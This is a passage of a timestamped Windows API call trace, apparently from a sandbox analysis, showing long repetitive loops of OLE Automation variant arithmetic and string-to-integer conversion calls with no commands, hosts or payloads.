pvarResult=0x18f9e0) returned 0x0 [0069.393] GetUserDefaultLCID () returned 0x409 [0069.393] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.393] GetUserDefaultLCID () returned 0x409 [0069.393] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.393] GetUserDefaultLCID () returned 0x409 [0069.393] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.393] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.393] GetUserDefaultLCID () returned 0x409 [0069.393] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.393] GetUserDefaultLCID () returned 0x409 [0069.393] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.393] GetUserDefaultLCID () returned 0x409 [0069.393] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.393] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.393] GetUserDefaultLCID () returned 0x409 [0069.393] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.394] GetUserDefaultLCID () returned 0x409 [0069.394] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.394] GetUserDefaultLCID () returned 0x409 [0069.394] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.394] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.394] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.394] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.394] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.394] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.394] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.394] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.394] GetUserDefaultLCID () returned 0x409 [0069.394] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.394] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.394] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.394] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.394] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.394] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.394] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.394] GetUserDefaultLCID () returned 0x409 [0069.394] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.394] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.394] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.394] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.394] GetUserDefaultLCID () returned 0x409 [0069.394] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.395] GetUserDefaultLCID () returned 0x409 [0069.395] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.395] GetUserDefaultLCID () returned 0x409 [0069.395] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.395] GetUserDefaultLCID () returned 0x409 [0069.395] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.395] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.395] GetUserDefaultLCID () returned 0x409 [0069.395] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.395] GetUserDefaultLCID () returned 0x409 [0069.395] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.395] GetUserDefaultLCID () returned 0x409 [0069.395] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.395] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.395] GetUserDefaultLCID () returned 0x409 [0069.395] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.395] GetUserDefaultLCID () returned 0x409 [0069.395] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.395] GetUserDefaultLCID () returned 0x409 [0069.395] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.396] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.396] GetUserDefaultLCID () returned 0x409 [0069.396] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.396] GetUserDefaultLCID () returned 0x409 [0069.396] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.396] GetUserDefaultLCID () returned 0x409 [0069.396] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.396] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.396] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.396] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.396] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.396] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.396] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.396] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.396] GetUserDefaultLCID () returned 0x409 [0069.396] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.396] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.396] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.396] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.396] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.396] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.396] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.396] GetUserDefaultLCID () returned 0x409 [0069.396] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.397] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.397] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.397] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.397] GetUserDefaultLCID () returned 0x409 [0069.397] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.397] GetUserDefaultLCID () returned 0x409 [0069.397] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.397] GetUserDefaultLCID () returned 0x409 [0069.397] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.397] GetUserDefaultLCID () returned 0x409 [0069.397] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.397] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.397] GetUserDefaultLCID () returned 0x409 [0069.397] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.397] GetUserDefaultLCID () returned 0x409 [0069.397] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.397] GetUserDefaultLCID () returned 0x409 [0069.397] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.397] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.397] GetUserDefaultLCID () returned 0x409 [0069.397] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.397] GetUserDefaultLCID () returned 0x409 [0069.397] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.398] GetUserDefaultLCID () returned 0x409 [0069.398] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.398] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.398] GetUserDefaultLCID () returned 0x409 [0069.398] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.398] GetUserDefaultLCID () returned 0x409 [0069.398] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.398] GetUserDefaultLCID () returned 0x409 [0069.398] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.398] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.398] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.398] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.398] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.398] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.398] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.398] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.398] GetUserDefaultLCID () returned 0x409 [0069.398] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.398] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.398] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.398] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.398] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.398] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.398] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.398] GetUserDefaultLCID () returned 0x409 [0069.399] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.399] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.399] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.399] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.399] GetUserDefaultLCID () returned 0x409 [0069.399] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.399] GetUserDefaultLCID () returned 0x409 [0069.399] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.399] GetUserDefaultLCID () returned 0x409 [0069.399] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.399] GetUserDefaultLCID () returned 0x409 [0069.399] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.399] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.399] GetUserDefaultLCID () returned 0x409 [0069.399] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.399] GetUserDefaultLCID () returned 0x409 [0069.399] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.399] GetUserDefaultLCID () returned 0x409 [0069.399] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.399] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.399] GetUserDefaultLCID () returned 0x409 [0069.399] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.399] GetUserDefaultLCID () returned 0x409 [0069.399] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.400] GetUserDefaultLCID () returned 0x409 [0069.400] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.400] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.400] GetUserDefaultLCID () returned 0x409 [0069.400] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.400] GetUserDefaultLCID () returned 0x409 [0069.400] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.400] GetUserDefaultLCID () returned 0x409 [0069.400] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.400] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.400] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.400] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.400] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.400] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.400] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.400] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.400] GetUserDefaultLCID () returned 0x409 [0069.400] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.400] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.400] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.400] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.400] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.400] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.401] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.401] GetUserDefaultLCID () returned 0x409 [0069.401] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.401] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.401] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.401] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.401] GetUserDefaultLCID () returned 0x409 [0069.401] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.401] GetUserDefaultLCID () returned 0x409 [0069.401] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.401] GetUserDefaultLCID () returned 0x409 [0069.401] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.401] GetUserDefaultLCID () returned 0x409 [0069.401] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.401] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.401] GetUserDefaultLCID () returned 0x409 [0069.401] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.401] GetUserDefaultLCID () returned 0x409 [0069.401] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.401] GetUserDefaultLCID () returned 0x409 [0069.402] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.402] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.402] GetUserDefaultLCID () returned 0x409 [0069.402] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.402] GetUserDefaultLCID () returned 0x409 [0069.402] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.402] GetUserDefaultLCID () returned 0x409 [0069.402] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.402] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.402] GetUserDefaultLCID () returned 0x409 [0069.402] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.402] GetUserDefaultLCID () returned 0x409 [0069.402] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.402] GetUserDefaultLCID () returned 0x409 [0069.402] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.402] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.402] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.402] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.402] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.402] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.402] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.402] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.402] GetUserDefaultLCID () returned 0x409 [0069.403] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.403] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.403] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.403] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.403] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.403] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.403] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.403] GetUserDefaultLCID () returned 0x409 [0069.403] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.403] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.403] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.403] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.403] GetUserDefaultLCID () returned 0x409 [0069.403] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f9d8 | out: plOut=0x18f9d8) returned 0x0 [0069.403] GetUserDefaultLCID () returned 0x409 [0069.403] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.403] GetUserDefaultLCID () returned 0x409 [0069.403] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.403] GetUserDefaultLCID () returned 0x409 [0069.403] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.403] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.403] GetUserDefaultLCID () returned 0x409 [0069.403] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.403] GetUserDefaultLCID () returned 0x409 [0069.403] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.403] GetUserDefaultLCID () returned 0x409 [0069.404] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.404] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.404] GetUserDefaultLCID () returned 0x409 [0069.404] VarI4FromStr (in: strIn="1", lcid=0x409, dwFlags=0x0, plOut=0x18f938 | out: plOut=0x18f938) returned 0x0 [0069.404] GetUserDefaultLCID () returned 0x409 [0069.404] VarI4FromStr (in: strIn="0", lcid=0x409, dwFlags=0x0, plOut=0x18f99c | out: plOut=0x18f99c) returned 0x0 [0069.404] GetUserDefaultLCID () returned 0x409 [0069.404] VarI4FromStr (in: strIn="1", lcid=0x409, 